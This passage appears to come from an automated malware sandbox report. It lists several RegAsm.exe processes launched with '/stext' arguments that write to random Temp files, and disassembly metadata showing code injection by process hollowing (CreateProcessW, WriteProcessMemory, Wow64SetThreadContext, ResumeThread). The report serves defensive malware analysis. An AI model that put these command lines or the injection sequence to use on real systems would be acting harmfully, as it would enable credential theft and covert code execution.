                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:16
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:17
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:19
                                                                                                                                Start time:03:29:16
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:03:29:16
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:21
                                                                                                                                Start time:03:29:16
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.411323631.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7fd3633431008202ca01e707f00d3b9b8c8eca4fadf21f1b4af3f38c63a2d101
                                                                                                                                  • Instruction ID: 50723fd4d13d9c0dd15782d537dc288d4618d251744ad2c610ae78addeb88bed
                                                                                                                                  • Opcode Fuzzy Hash: 7fd3633431008202ca01e707f00d3b9b8c8eca4fadf21f1b4af3f38c63a2d101
                                                                                                                                  • Instruction Fuzzy Hash: E001F231504340AFEB104F26ECC4B67FB98EF41764F2C851AFC490B286C37A9841CAB2
                                                                                                                                  Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.411323631.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e57719f9ca916e6f7cde899bf989cb57e1c531e110bd6514ac57008db9c15c78
                                                                                                                                  • Instruction ID: 4ec17db8173190a02f123ac40b93c2a1b5b7e4f90d5304c5bdc9202babc8eed9
                                                                                                                                  • Opcode Fuzzy Hash: e57719f9ca916e6f7cde899bf989cb57e1c531e110bd6514ac57008db9c15c78
                                                                                                                                  • Instruction Fuzzy Hash: DCF0CD71504340AFEB108E16DCC4B67FBA8EB81724F28C45AFC484A286C37A9C44CAB1

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:3.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:28
                                                                                                                                  Total number of Limit Nodes:5
                                                                                                                                  execution_graph 7942 437d40 7943 437d90 WriteProcessMemory 7942->7943 7944 437d88 7942->7944 7945 437dcb 7943->7945 7944->7943 7946 4354e0 7948 4354f3 7946->7948 7947 435534 7948->7947 7951 436531 7948->7951 7956 436790 7948->7956 7953 43659e 7951->7953 7952 43672a 7952->7948 7953->7952 7961 436f58 7953->7961 7965 436ea8 ResumeThread 7953->7965 7958 4367a9 7956->7958 7957 436801 7957->7948 7958->7957 7959 436f58 ResumeThread 7958->7959 7960 436ea8 ResumeThread 7958->7960 7959->7958 7960->7958 7962 436f66 7961->7962 7963 436ea8 ResumeThread 7962->7963 7964 4368d1 7962->7964 7963->7964 7964->7953 7966 4368d1 7965->7966 7966->7953 7967 437988 7968 437a03 CreateProcessW 7967->7968 7970 437ae1 7968->7970 7971 437bc8 7972 437c14 Wow64SetThreadContext 7971->7972 7973 437c0a 7971->7973 7974 437c42 7972->7974 7973->7972

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0043745C Relevance: 2.7, APIs: 1, Instructions: 1223processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 43745c-4374c9 2 4374cb-4374d5 0->2 3 43750e-437517 0->3 4 4374d7-4374e9 2->4 5 43751a-437528 2->5 3->5 6 4374eb-4374f9 4->6 7 43752e-437531 4->7 8 437597-4375a9 5->8 9 43752a-43752b 5->9 10 4374fb-437509 6->10 11 43753e-437551 6->11 12 437533-437535 7->12 13 437576-437579 7->13 23 4375aa-4375ac 8->23 9->7 10->3 17 437553-437565 11->17 18 437596 11->18 14 437537-437539 12->14 15 43757a-43757d 12->15 21 43753b-43753d 14->21 22 43757e-437595 14->22 15->22 17->23 24 437567-437569 17->24 18->8 21->11 22->18 26 4375ae-4375b0 23->26 25 43756b-43756d 24->25 24->26 30 4375b2-437a01 25->30 31 43756f-437575 25->31 26->30 32 437a03-437a06 30->32 33 437a09-437a10 30->33 31->13 32->33 34 437a12-437a18 33->34 35 437a1b-437a31 33->35 34->35 36 437a33-437a39 35->36 37 437a3c-437adf CreateProcessW 35->37 36->37 39 437ae1-437ae7 37->39 40 437ae8-437b60 37->40 39->40 47 437b72-437b79 40->47 48 437b62-437b68 40->48 49 437b90 47->49 50 437b7b-437b8a 47->50 48->47 52 437b91 49->52 50->49 52->52
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00437ACC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: d9560b2372878cb7d9bfb74832e7fe53e83dd1b1931631aee27b09243ce3411b
                                                                                                                                  • Instruction ID: 9d744be53f3d06ffca83eef9de996f1ea225d1ce1cbde258d9fd7473bad7baa1
                                                                                                                                  • Opcode Fuzzy Hash: d9560b2372878cb7d9bfb74832e7fe53e83dd1b1931631aee27b09243ce3411b
                                                                                                                                  • Instruction Fuzzy Hash: BBA1E6B180D3859FDB22CF64CCA07D9BFB0EF06210F1595DBC885A7192D738594ACB66
                                                                                                                                  Function 0083102D Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 53 83102d-831030 54 831032-831034 53->54 55 831036-83103e 53->55 54->55 56 831040-831046 55->56 57 831056-83105a 55->57 58 83104a-831054 56->58 59 831048 56->59 60 831060-831064 57->60 61 8311bb-8311c5 57->61 58->57 59->57 64 831077 60->64 65 831066-831075 60->65 62 8311d3-8311d9 61->62 63 8311c7-8311d0 61->63 67 8311db-8311dd 62->67 68 8311df-8311eb 62->68 69 831079-83107b 64->69 65->69 70 8311ed-83120b 67->70 68->70 69->61 71 831081-8310a1 69->71 77 8310a3-8310be 71->77 78 8310c0 71->78 79 8310c2-8310c4 77->79 78->79 79->61 81 8310ca-8310cc 79->81 82 8310ce-8310da 81->82 83 8310dc 81->83 85 8310de-8310e0 82->85 83->85 85->61 86 8310e6-831106 85->86 89 831108-83110e 86->89 90 83111e-831122 86->90 91 831112-831114 89->91 92 831110 89->92 93 831124-83112a 90->93 94 83113c-831140 90->94 91->90 92->90 95 83112e-83113a 93->95 96 83112c 93->96 97 831147-831149 94->97 95->94 96->94 99 831161-8311b8 97->99 100 83114b-831151 97->100 102 831153 100->102 103 831155-831157 100->103 102->99 103->99
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: @#e$@#e
                                                                                                                                  • API String ID: 0-2837462967
                                                                                                                                  • Opcode ID: e76924eee93355f0538016e51ecd0cd15b2386f758e2aa47831cd6b0091bb0a1
                                                                                                                                  • Instruction ID: 132d0f1e7629d534d357184d07fbd2759f0af7470b8e363b8adcccd3f6105dca
                                                                                                                                  • Opcode Fuzzy Hash: e76924eee93355f0538016e51ecd0cd15b2386f758e2aa47831cd6b0091bb0a1
                                                                                                                                  • Instruction Fuzzy Hash: 1D4126357042068BDF281A7598252BEB3A2FBD0B14F30847ACA55CB280DF75CC81C7E2
                                                                                                                                  Function 00437574 Relevance: 2.2, APIs: 1, Instructions: 667processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 104 437574-437579
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00437ACC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 882e93410ef258c3e5ec1532127a667f51103cc99f3c2bcceaacb76785589b6a
                                                                                                                                  • Instruction ID: 51bcd4bad4e70e5c5435a53edf399d9c21f80d3bba9362dafc5e4d1911ef6e7a
                                                                                                                                  • Opcode Fuzzy Hash: 882e93410ef258c3e5ec1532127a667f51103cc99f3c2bcceaacb76785589b6a
                                                                                                                                  • Instruction Fuzzy Hash: 59616AB19093598FDB22CF68C890BDDBBB0AF09304F1584EBD949AB251D7345A89CF61
                                                                                                                                  Function 00437988 Relevance: 1.7, APIs: 1, Instructions: 153processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 107 437988-437a01 108 437a03-437a06 107->108 109 437a09-437a10 107->109 108->109 110 437a12-437a18 109->110 111 437a1b-437a31 109->111 110->111 112 437a33-437a39 111->112 113 437a3c-437adf CreateProcessW 111->113 112->113 115 437ae1-437ae7 113->115 116 437ae8-437b60 113->116 115->116 123 437b72-437b79 116->123 124 437b62-437b68 116->124 125 437b90 123->125 126 437b7b-437b8a 123->126 124->123 128 437b91 125->128 126->125 128->128
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00437ACC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 076b1a72e4afbb7e3ec9063249921c505323e89272fdfe0a9e5833a599fa9440
                                                                                                                                  • Instruction ID: 5fecd73e6297e3fa95938dfaf3dfc1dea4c701290b07b7489af39d5a8292346d
                                                                                                                                  • Opcode Fuzzy Hash: 076b1a72e4afbb7e3ec9063249921c505323e89272fdfe0a9e5833a599fa9440
                                                                                                                                  • Instruction Fuzzy Hash: DA5115B1D012199FEF25CF95C980BDEBBB5BF48304F1085AAE909B7250D7759A88CF60
                                                                                                                                  Function 00437D3E Relevance: 1.6, APIs: 1, Instructions: 61injectionCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 160 437d3e-437d86 161 437d90-437dc9 WriteProcessMemory 160->161 162 437d88-437d8e 160->162 163 437dd2-437df3 161->163 164 437dcb-437dd1 161->164 162->161 164->163
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00437DBC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: fd0b6cf971d219642dafaaec8be495e391d58b3fa9559d17726afb9cd6b7fbbf
                                                                                                                                  • Instruction ID: 37de9b9c1b618b3a88d343d467d8a57232f963541a3e920bd563fcac4d8be626
                                                                                                                                  • Opcode Fuzzy Hash: fd0b6cf971d219642dafaaec8be495e391d58b3fa9559d17726afb9cd6b7fbbf
                                                                                                                                  • Instruction Fuzzy Hash: 3C21E4B19002499FDB10CFAAD985BEEBBF4FF48310F50842AE458A7250D378A944CF65
                                                                                                                                  Function 00437D40 Relevance: 1.6, APIs: 1, Instructions: 60injectionCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 166 437d40-437d86 167 437d90-437dc9 WriteProcessMemory 166->167 168 437d88-437d8e 166->168 169 437dd2-437df3 167->169 170 437dcb-437dd1 167->170 168->167 170->169
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00437DBC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 2395a8a6bfd13d7d6a33027627a1aac6803bac3d198e965f108a2f5aaaa40682
                                                                                                                                  • Instruction ID: 0add6a87df727e8b194cea2befcc5fdcb85381f42a6b6599427c4ec0ef99a021
                                                                                                                                  • Opcode Fuzzy Hash: 2395a8a6bfd13d7d6a33027627a1aac6803bac3d198e965f108a2f5aaaa40682
                                                                                                                                  • Instruction Fuzzy Hash: C221B4B19003599FDB10CF9AD985BDEBBF4FF48310F50842AE558A7250D378A944CBA5
                                                                                                                                  Function 00437BC0 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 172 437bc0-437c08 173 437c14-437c40 Wow64SetThreadContext 172->173 174 437c0a-437c12 172->174 175 437c42-437c48 173->175 176 437c49-437c6a 173->176 174->173 175->176
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00437C33
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 5d5afdc7515e9d5c77791594949a33b1a674cc0991b881cc60fe7b9cf36776ad
                                                                                                                                  • Instruction ID: 1efd74aecfa3c2645a10f2db5b3c3b73996fd54cd4a96afc61278bdc20cc8f2d
                                                                                                                                  • Opcode Fuzzy Hash: 5d5afdc7515e9d5c77791594949a33b1a674cc0991b881cc60fe7b9cf36776ad
                                                                                                                                  • Instruction Fuzzy Hash: FF1159B6D046498FDB20CFAAD944BDEFBF4EB88320F24816AD458A3341D3789545CF65
                                                                                                                                  Function 00437BC8 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 178 437bc8-437c08 179 437c14-437c40 Wow64SetThreadContext 178->179 180 437c0a-437c12 178->180 181 437c42-437c48 179->181 182 437c49-437c6a 179->182 180->179 181->182
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00437C33
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 7fca75a9d93582877fe5fbe120c72bf805d45e20941108d6af8c230f517630d7
                                                                                                                                  • Instruction ID: d392b122b272db431ad955fbb6449e742b1fbc2499072b4a35f80a9b7232cb88
                                                                                                                                  • Opcode Fuzzy Hash: 7fca75a9d93582877fe5fbe120c72bf805d45e20941108d6af8c230f517630d7
                                                                                                                                  • Instruction Fuzzy Hash: 401104B2D006498FDB20CFAAC944BDEFBF4EB88320F55842AD458A3340D378A545CFA5
                                                                                                                                  Function 00436F58 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 184 436f58-436f68 call 431824 187 436ea8-436ee6 ResumeThread 184->187 188 436f6e-436f7c 184->188 191 436ee8-436eee 187->191 192 436eef-436efc 187->192 189 436f82-436f85 188->189 190 43694d-436950 188->190 189->190 193 437250-437259 190->193 194 436956-43704d 190->194 191->192 195 436f02-436f13 192->195 196 4373fb-437402 192->196 198 437308-437328 193->198 199 43725f-437272 193->199 202 437059-437062 194->202 203 43704f-437054 194->203 195->190 200 436f19-436f1c 195->200 211 437333-437336 198->211 212 43732a-43732f 198->212 199->190 199->198 200->190 202->198 206 437068-43706b 202->206 203->190 206->198 208 437071-437092 206->208 208->190 213 437098-43709b 208->213 214 437353-43736a 211->214 215 437338 211->215 212->211 213->190 214->211 224 43736c 214->224 215->214 216 437398-43739d 215->216 217 43733f-43734d 215->217 218 43736e-437377 215->218 226 4373cf-437450 216->226 217->211 219 43734f-437351 217->219 221 437379-437383 218->221 222 43739f-4373c1 218->222 219->211 228 437385-43738a 221->228 229 43738c-437396 call 4352dc 221->229 231 4368d1-4368d4 222->231 232 4373c7-4373ca 222->232 224->211 228->211 229->216 238 437331 229->238 234 4373d4-4373ed 231->234 235 4368da 231->235 232->226 232->231 234->231 236 4373f3-4373f6 234->236 235->235 236->231 238->211
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 6731f69c8a6a9f281b615b26deb179ab0e1d229d85b71bf2489a8cfd52d6b8d2
                                                                                                                                  • Instruction ID: 11f275c8874ff4451c2688206da9e045def505e2e286057a87fe718106920025
                                                                                                                                  • Opcode Fuzzy Hash: 6731f69c8a6a9f281b615b26deb179ab0e1d229d85b71bf2489a8cfd52d6b8d2
                                                                                                                                  • Instruction Fuzzy Hash: 60118C74904349DFEB20CF14C948B9AB7B2BF49319F2291D6D4085B3A2C7789D89CF19
                                                                                                                                  Function 00436EA8 Relevance: 1.5, APIs: 1, Instructions: 29threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 239 436ea8-436ee6 ResumeThread 240 436ee8-436eee 239->240 241 436eef-436efc 239->241 240->241 242 436f02-436f13 241->242 243 4373fb-437402 241->243 245 436f19-436f1c 242->245 246 43694d-436950 242->246 245->246 247 437250-437259 246->247 248 436956-43704d 246->248 249 437308-437328 247->249 250 43725f-437272 247->250 252 437059-437062 248->252 253 43704f-437054 248->253 261 437333-437336 249->261 262 43732a-43732f 249->262 250->246 250->249 252->249 256 437068-43706b 252->256 253->246 256->249 258 437071-437092 256->258 258->246 263 437098-43709b 258->263 264 437353-43736a 261->264 265 437338 261->265 262->261 263->246 264->261 274 43736c 264->274 265->264 266 437398-43739d 265->266 267 43733f-43734d 265->267 268 43736e-437377 265->268 276 4373cf-437450 266->276 267->261 269 43734f-437351 267->269 271 437379-437383 268->271 272 43739f-4373c1 268->272 269->261 278 437385-43738a 271->278 279 43738c-437396 call 4352dc 271->279 281 4368d1-4368d4 272->281 282 4373c7-4373ca 272->282 274->261 278->261 279->266 288 437331 279->288 284 4373d4-4373ed 281->284 285 4368da 281->285 282->276 282->281 284->281 286 4373f3-4373f6 284->286 285->285 286->281 288->261
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: eb358fbe2d832c74e0ae7c35f6ac21db4df2842c3dbbb45376c697149c333595
                                                                                                                                  • Instruction ID: e011b9f1dcf125381e965b8981a72f6c281e10d1aafcef5a3eb09d2e26f663f9
                                                                                                                                  • Opcode Fuzzy Hash: eb358fbe2d832c74e0ae7c35f6ac21db4df2842c3dbbb45376c697149c333595
                                                                                                                                  • Instruction Fuzzy Hash: CF016974904358DFEB20CF64C948799BBB1EB09319F2190CAD4496B392C7794989DF16
                                                                                                                                  Function 0083163F Relevance: .1, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9732208265ac812ef9e1be5eb76945412ef68f16beea6faafea0f4437e718c2
                                                                                                                                  • Instruction ID: 4b2c51e4ee933d6060858a0f0cc544f43ae1f880b7af8d06a317e84dcb7f540d
                                                                                                                                  • Opcode Fuzzy Hash: d9732208265ac812ef9e1be5eb76945412ef68f16beea6faafea0f4437e718c2
                                                                                                                                  • Instruction Fuzzy Hash: 5821F23160D3C55FCF029FB498657A97FA1BF96200F1C81AAE9848F0D7DB249816C7A2
                                                                                                                                  Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.406963759.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75f0600fbe3f864cc5fe06e7f2fbcccaec61ae8663c55c314721f8d3673add8b
                                                                                                                                  • Instruction ID: 2eb75a932cd73f54e827ecb65f48e74cec6097b9ac6d197899611b4d1bceefc0
                                                                                                                                  • Opcode Fuzzy Hash: 75f0600fbe3f864cc5fe06e7f2fbcccaec61ae8663c55c314721f8d3673add8b
                                                                                                                                  • Instruction Fuzzy Hash: 6F01A271504340AFEB104F26ECC4B67FB98EF41764F2C855AFD494B286C37A9845CAB2
                                                                                                                                  Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.406963759.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc79e81a7fdba639ff39f5aa63251550d4baab74e3a912e3247e636ba8c9b844
                                                                                                                                  • Instruction ID: 16a244534757f22fd543cd8b753dabc2033c45730f3fbdaf39176ad18cab7365
                                                                                                                                  • Opcode Fuzzy Hash: bc79e81a7fdba639ff39f5aa63251550d4baab74e3a912e3247e636ba8c9b844
                                                                                                                                  • Instruction Fuzzy Hash: FFF0CD71504340AFEB108E16DCC4B66FBA8EB81724F28C05AFD484B286C37A9C44CAB2
                                                                                                                                  Function 008326D7 Relevance: .0, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
